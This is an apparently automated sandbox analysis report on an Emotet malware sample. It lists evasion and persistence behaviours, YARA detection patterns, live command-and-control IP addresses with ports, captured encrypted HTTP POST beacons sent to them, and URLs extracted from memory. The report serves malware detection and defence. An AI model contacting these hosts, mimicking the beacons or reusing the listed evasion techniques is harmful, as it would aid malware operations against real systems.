Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report yxghUyIGb4

Overview

General Information

Sample Name:yxghUyIGb4 (renamed file extension from none to exe)
Analysis ID:377029
MD5:ecbc4b40dcfec4ed1b2647b217da0441
SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates files in the system32 config directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • yxghUyIGb4.exe (PID: 676 cmdline: 'C:\Users\user\Desktop\yxghUyIGb4.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • yxghUyIGb4.exe (PID: 4552 cmdline: C:\Users\user\Desktop\yxghUyIGb4.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • windowdcom.exe (PID: 5508 cmdline: C:\Windows\SysWOW64\windowdcom.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • windowdcom.exe (PID: 5860 cmdline: C:\Windows\SysWOW64\windowdcom.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • svchost.exe (PID: 2408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5568 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4544 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4788 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5380 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1260 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6072 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5968 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1708 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
yxghUyIGb4.exeJoeSecurity_EmotetYara detected EmotetJoe Security
    yxghUyIGb4.exeEmotetEmotet Payloadkevoreilly
    • 0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18
    • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.0.windowdcom.exe.820000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                2.0.windowdcom.exe.820000.0.unpackEmotetEmotet Payloadkevoreilly
                • 0x16f0:$snippet1: FF 15 F8 C1 82 00 83 C4 0C 68 40 00 00 F0 6A 18
                • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 82 00 85 C0
                1.0.yxghUyIGb4.exe.820000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  1.0.yxghUyIGb4.exe.820000.0.unpackEmotetEmotet Payloadkevoreilly
                  • 0x16f0:$snippet1: FF 15 F8 C1 82 00 83 C4 0C 68 40 00 00 F0 6A 18
                  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 82 00 85 C0
                  0.0.yxghUyIGb4.exe.820000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 11 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: yxghUyIGb4.exeAvira: detected
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: yxghUyIGb4.exeVirustotal: Detection: 83%Perma Link
                    Source: yxghUyIGb4.exeReversingLabs: Detection: 96%
                    Machine Learning detection for sampleShow sources
                    Source: yxghUyIGb4.exeJoe Sandbox ML: detected
                    Source: yxghUyIGb4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 167.114.153.153:443 -> 192.168.2.3:49744 version: TLS 1.2
                    Source: yxghUyIGb4.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: global trafficTCP traffic: 192.168.2.3:49723 -> 193.169.54.12:8080
                    Source: global trafficTCP traffic: 192.168.2.3:49740 -> 173.230.145.224:8080
                    Source: global trafficTCP traffic: 192.168.2.3:49742 -> 80.86.91.232:7080
                    Source: global trafficTCP traffic: 192.168.2.3:49745 -> 80.82.115.164:4143
                    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 71.244.60.231:4143
                    Source: global trafficTCP traffic: 192.168.2.3:49753 -> 186.103.199.252:4143
                    Source: global trafficTCP traffic: 192.168.2.3:49755 -> 159.203.94.198:4143
                    Source: Joe Sandbox ViewIP Address: 178.62.39.238 178.62.39.238
                    Source: Joe Sandbox ViewIP Address: 80.86.91.232 80.86.91.232
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 420Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 15 bd 9f bb 28 80 55 87 52 c0 ff d4 3c f7 e5 97 ae be b6 09 51 9c 77 77 ed 38 f6 d4 fe 22 da bb 96 3d 22 9d 57 37 0a 2f d4 3a 4d 6b 8b 5e e0 6c 13 21 be eb fe 2e c7 be ec 03 1d bc ba 6d 46 62 22 26 ae ef 33 53 6e 58 83 77 67 d9 64 ba 64 88 59 af 59 02 7d 74 2b 4f 12 54 7d c3 73 ae 77 98 e8 12 cd bc 7c 26 a1 ad a4 b2 5d fa 3f fc 1f 4a 1d 22 61 4c 5b cc 04 e6 69 91 ce f5 53 a1 08 f5 f8 bc 9c 11 8b 02 ef 02 0d 69 d6 83 69 6d b2 b6 6b 01 b7 a6 74 f0 e0 b0 2a 10 ff 0c 33 d8 ec fb e2 2f 41 a9 d7 c9 61 16 c2 64 d0 76 b6 85 3a a5 2a 13 55 ca 95 8c e9 03 76 00 7c 40 1e a0 57 9d cc 90 e4 92 fd 48 9f 73 94 06 15 63 bb bf df bf 84 bf a8 12 14 da e2 86 1c 57 30 23 29 02 c2 e7 7e 55 1f cc f0 91 f2 bf 93 4f c1 c2 00 7b ba d6 83 59 eb 5c 03 2c f7 43 b1 d8 30 1f 51 d4 42 64 da d9 73 fc e3 01 28 4c ea bf a3 f3 c0 af 9a eb e8 9c 98 57 6e f9 ac 4e ed 8f aa b7 96 37 2f 0a 4e 7d 2d 5d e6 3a 3f 1c 7b d4 fc 5e c2 d5 91 15 20 57 66 34 99 68 d0 15 6a 85 f0 dc d7 0c 4c 83 9f 3e 5a eb bb 0c b9 20 7c eb 42 75 73 76 c2 d2 0d 52 62 d0 55 85 9c 0a 89 eb 51 79 a9 07 0d bb 82 6f ef 51 8c 02 d5 8a e3 e5 23 63 d4 6a be ef f1 2f aa 4b be 00 45 b6 df 03 4a d2 b5 f4 c7 e5 41 97 66 94 3e af 67 6c 5a c1 b9 ab 2d 3d 4e 8e 85 c4 e9 89 63 4a 4a 3e aa 04 52 c8 1d 6b dc fd 7b 0b 9d Data Ascii: d(UR<Qww8"="W7/:Mk^l!.mFb"&3SnXwgddYY}t+OT}sw|&]?J"aL[iSiimkt*3/Aadv:*Uv|@WHscW0#)~UO{Y\,C0QBds(LWnN7/N}-]:?{^ Wf4hjL>Z |BusvRbUQyoQ#cj/KEJAf>glZ-=NcJJ>Rk{
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 167.114.153.153Content-Length: 420Connection: Keep-AliveCache-Control: no-cacheData Raw: 1a d7 59 41 dc 17 11 dd a9 1c 01 8b 75 e0 96 cc 3c 04 50 4c 59 8e b3 38 e9 f3 3d 5c 70 4e 51 38 5e 81 6e dd 3d 4d b0 1e 4d e1 df 18 22 1b 8a ec b9 40 3c fc 6c 1e e8 2b 8b 2f e6 d9 6a ba 68 92 5c e4 8e 8b 74 06 11 57 4c 51 22 6b 4d d9 12 3f a2 ca 4d 8c 4c 72 4c d5 ae 06 50 f2 0b ff 93 10 3c 4c dd a6 1d 7c cb 0b 3e 5c 5b e8 52 7d 11 af 7f 57 1b db 09 ae d0 28 4f 8c 6e f4 be b5 aa 77 cb 7a 77 0a 12 8d 45 39 28 1a 81 c9 69 57 fd 1f d7 1e c8 cd d2 34 19 b1 9f df 2d 92 a7 0f 2c 07 62 82 58 2a 63 6b f4 f1 c1 76 60 bf 2a bb 71 f3 a2 15 2b 7f a1 b9 ec 3b 7c 3c 58 9f fc ae 67 47 1f 12 1c 1c 0f bc fe 16 f2 9e b3 c5 48 e7 10 e4 42 c3 97 ff db b9 5b 13 4e e0 7c 94 ac ef 64 99 89 a6 c8 0a 23 42 bf c2 2d 4f 7e 64 d1 77 1d 99 f7 23 32 cf 61 a1 90 83 0e 52 e5 1a 72 31 18 7e 1f 45 be 51 9c be 92 86 18 03 45 7f 58 fc 47 96 9f 14 b4 eb 2e f3 9b 74 83 bd 46 4b 11 4a 9a 95 2d e1 88 41 80 96 06 65 67 38 e0 e1 b1 d2 7c 83 9e 0b 84 89 45 52 29 df 21 50 0d fa c9 87 75 8b 64 ec 2f fb 1f ec ef 5d 82 26 98 ef 19 db a9 ca 8b 97 8d 28 73 0e 51 35 57 3c f1 ee 39 e2 28 7f 7c 33 45 7c 56 c9 7b 6d f7 7a d1 ef 8c 87 54 7f d0 b5 12 4a 00 77 53 30 bb 6f 14 04 ed 64 6e 6a 7c 34 0a c5 ff 58 84 7b 27 0b 86 b2 b4 be 17 2f fa 5e e8 e5 16 93 f4 d0 47 5d 41 d1 2d a2 69 39 87 a3 86 66 Data Ascii: YAu<PLY8=\pNQ8^n=MM"@<l+/jh\tWLQ"kM?MLrLP<L|>\[R}W(OnwzwE9(iW4-,bX*ckv`*q+;|<XgGHB[N|d#B-O~dw#2aRr1~EQEXG.tFKJ-Aeg8|ER)!Pud/]&(sQ5W<9(|3E|V{mzTJwS0odnj|4X{'/^G]A-i9f
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 178.62.39.238:443Content-Length: 404Connection: Keep-AliveCache-Control: no-cacheData Raw: 7f ff 1f d0 a2 75 6e 6e 1f 92 d6 a6 dc e8 90 7e 4c 38 25 02 95 1d e0 e8 c7 57 09 e6 75 35 bc a5 fc ca 35 cc 54 c6 b2 5a 2a dc 5d de 03 44 14 67 e8 83 f3 c0 fc b9 0f cd de ce 7a 46 e1 41 52 48 ec 17 a5 82 29 da df b6 ab f6 47 41 74 f9 d8 5d 16 1c 3f 41 fc 59 87 97 ed e5 d9 0a 61 6e 19 01 42 94 eb 94 0a 6d a6 be 56 d0 ff bc 2b 8d ff 66 38 df cc 08 94 15 c8 4f cf 78 25 b2 8a 68 82 28 36 34 c0 65 5c 92 e0 6e 5d f5 3d 3f 5b 1b 00 87 95 34 09 8f e0 16 58 cb 70 75 ee 53 38 33 71 bc 5c 86 af a6 4b 5a 27 3f 9b 6e da c2 fb 82 de ca af 70 0d 6a 70 89 98 e0 6d 8b f3 38 ce f6 d1 c7 06 54 7b 3a f8 b1 21 2d 14 50 bf 62 16 e1 0c 01 e7 fa c7 44 ac 51 5b cc 45 2c fd 53 d1 a2 05 66 ea 60 d7 b8 fc ce cf 28 53 8f 50 af f7 3d 02 2b cf a1 11 e5 9c f2 71 d1 21 2e 98 6a 08 fb b2 d7 a2 dd cd 7b dd 5c 10 38 a3 da f0 b8 59 71 61 2f a1 cc d5 ff 5e 10 8d 91 a1 d2 85 16 68 a9 e2 b8 60 a3 2a 66 3e 7e 42 18 4c 38 44 a4 d0 e6 54 0c 95 0d 02 05 19 80 96 8c c1 39 8d 90 cc 0d 04 7f 2d 03 da 7a 2a 8c a0 99 74 43 e4 15 d6 de fd 78 1a 59 64 38 ba a7 6f a4 06 0d 1b 11 81 79 eb 46 03 8c 65 6f 6e d7 8f f0 dc b2 32 e6 71 24 69 21 42 0a 11 6d f9 29 5f 3b 90 86 91 cb a0 64 05 ed 94 52 2d 04 88 7a c7 fb 1b be 0d 1e ac 06 e7 6d e8 05 79 1e Data Ascii: unn~L8%Wu55TZ*]DgzFARH)GAt]?AYanBmV+f8Ox%h(64e\n]=?[4XpuS83q\KZ'?npjpm8T{:!-PbDQ[E,Sf`(SP=+q!.j{\8Yqa/^h`*f>~BL8DT9-z*tCxYd8oyFeon2q$i!Bm)_;dR-zmy
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 388Connection: Keep-AliveCache-Control: no-cacheData Raw: 11 1e 7c 5e b6 2e f2 1f 58 9d c0 f2 81 bd 05 3d 92 21 e7 5f 8f 87 5a 10 3c b5 f3 13 d4 93 1d c4 1a 8b 67 ff e9 26 d8 03 e4 08 44 19 af 2c 38 1c 74 98 02 a8 d1 85 e0 8b 5f c8 d6 36 02 ba 4e 89 93 1e d7 6b d1 63 aa 2d f5 10 a0 d0 40 51 8d 91 e0 a5 c4 71 fb 8a a1 0b 84 51 47 0b dc 7b 7e 8f a6 1a 6e 9d c2 bd 64 86 fe d0 22 43 6d 50 24 5d 54 fa cf d3 18 c1 1e 46 62 a3 70 49 86 72 06 ee 36 21 8a 37 b0 14 89 5a 79 aa 59 cd 4e 8d 24 50 6c 8f 11 0f c9 7c e4 c7 cd de 63 00 d4 3c 08 9d a6 19 a4 ac a5 c0 d2 e1 3d f7 7a d1 2d 50 b1 0a 57 46 92 a7 a6 4c 98 e0 e9 48 9f 37 70 93 e2 47 55 8b 79 d6 bc 28 67 cb a4 12 b4 9c b4 55 5e b1 e6 3e 6d 0f 87 bb a7 08 6b c6 47 6a 0c bd 60 85 d3 7b 6b cb 04 c1 04 6d ac 73 a3 c4 c3 32 23 7d 54 d9 a9 93 36 ab 8c 21 3a 0c 53 6f f3 5b b9 68 79 bc 0b 05 be f8 ca 18 e9 e1 db 1c 12 58 2c e8 a1 9e d0 17 84 e2 0a ac 61 49 ea b8 8d 43 95 49 46 ff c5 13 25 64 0d 21 f6 e6 a8 d0 27 df cf bb 3d c8 ce 07 87 51 94 b2 27 18 f4 2d 87 1e b5 30 b0 b7 b6 d6 9c f0 cd 96 75 80 db 63 39 59 19 11 2b 78 6f a9 a2 ba 7e 0f 62 90 c2 f3 36 73 b8 37 0c 0f 2d 73 9e f5 95 d0 9f e3 63 77 a8 dd 88 85 f3 c7 1b e7 38 d2 17 d0 f2 24 a5 49 f6 da c8 4f 51 f2 6f 4e Data Ascii: |^.X=!_Z<g&D,8t_6Nkc-@QqQG{~nd"CmP$]TFbpIr6!7ZyYN$Pl|c<=z-PWFLH7pGUy(gU^>mkGj`{kms2#}T6!:So[hyX,aICIF%d!'=Q'-0uc9Y+xo~b6s7-scw8$IOQoN
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.232
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.232
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.232
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.82.115.164
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.153
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.82.115.164
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.82.115.164
                    Source: unknownTCP traffic detected without corresponding DNS query: 71.244.60.231
                    Source: unknownTCP traffic detected without corresponding DNS query: 71.244.60.231
                    Source: unknownTCP traffic detected without corresponding DNS query: 71.244.60.231
                    Source: unknownTCP traffic detected without corresponding DNS query: 186.103.199.252
                    Source: unknownTCP traffic detected without corresponding DNS query: 186.103.199.252
                    Source: unknownTCP traffic detected without corresponding DNS query: 186.103.199.252
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.187.4.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.187.4.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 37.187.4.178
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.203.94.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.203.94.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.203.94.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownTCP traffic detected without corresponding DNS query: 178.62.39.238
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 420Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 15 bd 9f bb 28 80 55 87 52 c0 ff d4 3c f7 e5 97 ae be b6 09 51 9c 77 77 ed 38 f6 d4 fe 22 da bb 96 3d 22 9d 57 37 0a 2f d4 3a 4d 6b 8b 5e e0 6c 13 21 be eb fe 2e c7 be ec 03 1d bc ba 6d 46 62 22 26 ae ef 33 53 6e 58 83 77 67 d9 64 ba 64 88 59 af 59 02 7d 74 2b 4f 12 54 7d c3 73 ae 77 98 e8 12 cd bc 7c 26 a1 ad a4 b2 5d fa 3f fc 1f 4a 1d 22 61 4c 5b cc 04 e6 69 91 ce f5 53 a1 08 f5 f8 bc 9c 11 8b 02 ef 02 0d 69 d6 83 69 6d b2 b6 6b 01 b7 a6 74 f0 e0 b0 2a 10 ff 0c 33 d8 ec fb e2 2f 41 a9 d7 c9 61 16 c2 64 d0 76 b6 85 3a a5 2a 13 55 ca 95 8c e9 03 76 00 7c 40 1e a0 57 9d cc 90 e4 92 fd 48 9f 73 94 06 15 63 bb bf df bf 84 bf a8 12 14 da e2 86 1c 57 30 23 29 02 c2 e7 7e 55 1f cc f0 91 f2 bf 93 4f c1 c2 00 7b ba d6 83 59 eb 5c 03 2c f7 43 b1 d8 30 1f 51 d4 42 64 da d9 73 fc e3 01 28 4c ea bf a3 f3 c0 af 9a eb e8 9c 98 57 6e f9 ac 4e ed 8f aa b7 96 37 2f 0a 4e 7d 2d 5d e6 3a 3f 1c 7b d4 fc 5e c2 d5 91 15 20 57 66 34 99 68 d0 15 6a 85 f0 dc d7 0c 4c 83 9f 3e 5a eb bb 0c b9 20 7c eb 42 75 73 76 c2 d2 0d 52 62 d0 55 85 9c 0a 89 eb 51 79 a9 07 0d bb 82 6f ef 51 8c 02 d5 8a e3 e5 23 63 d4 6a be ef f1 2f aa 4b be 00 45 b6 df 03 4a d2 b5 f4 c7 e5 41 97 66 94 3e af 67 6c 5a c1 b9 ab 2d 3d 4e 8e 85 c4 e9 89 63 4a 4a 3e aa 04 52 c8 1d 6b dc fd 7b 0b 9d Data Ascii: d(UR<Qww8"="W7/:Mk^l!.mFb"&3SnXwgddYY}t+OT}sw|&]?J"aL[iSiimkt*3/Aadv:*Uv|@WHscW0#)~UO{Y\,C0QBds(LWnN7/N}-]:?{^ Wf4hjL>Z |BusvRbUQyoQ#cj/KEJAf>glZ-=NcJJ>Rk{
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://159.203.94.198:4143/
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://167.114.153.153/
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://178.62.39.238:443/
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://178.62.39.238:443//
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://186.103.199.252:4143/
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://37.187.4.178/
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://71.244.60.231:4143/
                    Source: windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: http://71.244.60.231:4143/%
                    Source: windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: http://71.244.60.231:4143/AES
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://71.244.60.231:4143/E
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmp, windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmpString found in binary or memory: http://79.172.249.82:443/
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443//
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443//5
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/3.94.198:4143/
                    Source: windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/=
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/p%
                    Source: windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: http://80.82.115.164:4143/
                    Source: windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: http://80.82.115.164:4143/-
                    Source: windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: http://80.82.115.164:4143/5
                    Source: svchost.exe, 0000001B.00000003.813605285.00000148F132E000.00000004.00000001.sdmpString found in binary or memory: http://Passport.NET/STS
                    Source: svchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd
                    Source: svchost.exe, 0000001B.00000002.1211409705.00000148F1A02000.00000004.00000001.sdmpString found in binary or memory: http://Passport.NET/tbpose
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                    Source: svchost.exe, 0000001B.00000002.1210398171.00000148F0CDC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                    Source: svchost.exe, 0000001B.00000002.1210398171.00000148F0CDC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
                    Source: svchost.exe, 00000006.00000002.598391848.0000013C6860F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 0000001B.00000002.1210398171.00000148F0CDC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
